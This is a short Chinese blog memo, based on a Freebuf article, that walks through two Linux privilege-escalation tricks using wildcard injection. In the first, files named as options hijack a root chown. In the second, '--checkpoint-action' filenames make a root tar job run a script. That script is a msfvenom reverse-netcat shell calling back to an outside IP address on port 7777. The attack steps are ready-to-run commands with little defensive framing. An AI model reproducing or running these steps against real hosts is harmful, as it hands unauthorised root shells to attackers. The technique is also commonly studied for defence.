参考Freebuf上的提权文章(利用通配符进行Linux本地提权):
http://www.freebuf.com/articles/system/176255.html
以两个例子的形式进行记录,作为备忘:
0x01 Chown的--reference特性
存在三个用户:root、yunsle和test,假设这样一个场景,root用户要将/home/test下所有的文件所有者设置为test,那么yunsle如何通过root的这样一个操作,达到攻击目的呢?
文件中目前内容如下:
snipaste20180802_114639.png
攻击者yunsle在/home/test下创建两个文件,如下:
echo "">yunsle
echo > --reference=yunsle
snipaste20180802_114719.png
此时root用户在当前目录下执行将所有文件拥有者设置为test的chown命令:
chown -R test:test *
snipaste20180802_114751.png
虽然命令执行出现了报错,但是再查看文件,发现拥有者并没有修改为test,而是yunsle:
snipaste20180802_114819.png
0x02 tar的命令执行:--checkpoint-action&--checkpoint
存在两个用户:root、yunsle,其中yunsle是非root组的攻击者,需要想办法提升权限,可以使用tar命令进行利用。
如果在cron计划中,root用户存在计划执行并且使用到了tar命令,或者攻击者提前知道root会对某个人文件执行tar,可以形成攻击场景。
攻击者首先自己可以生成一个反弹shell,如使用msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=47.94.37.40 lport=7777 R
snipaste20180802_114846.png
并且在接收机上监听7777端口:
snipaste20180802_114917.png
将反弹shell内容在目标机上,写入shell.sh文件:
snipaste20180802_114931.png
接下来再创建两个文件:
echo > "--checkpoint-action=exec=sh shell.sh"
echo > --checkpoint=1
snipaste20180802_114953.png
此时,root对当前目录执行类似如下的tar操作:
tar -zcf bak.tgz /home/test/*
snipaste20180802_115017.png
已经成功以root身份执行shell.sh,并且将shell反弹至攻击者服务器:
snipaste20180802_115034.png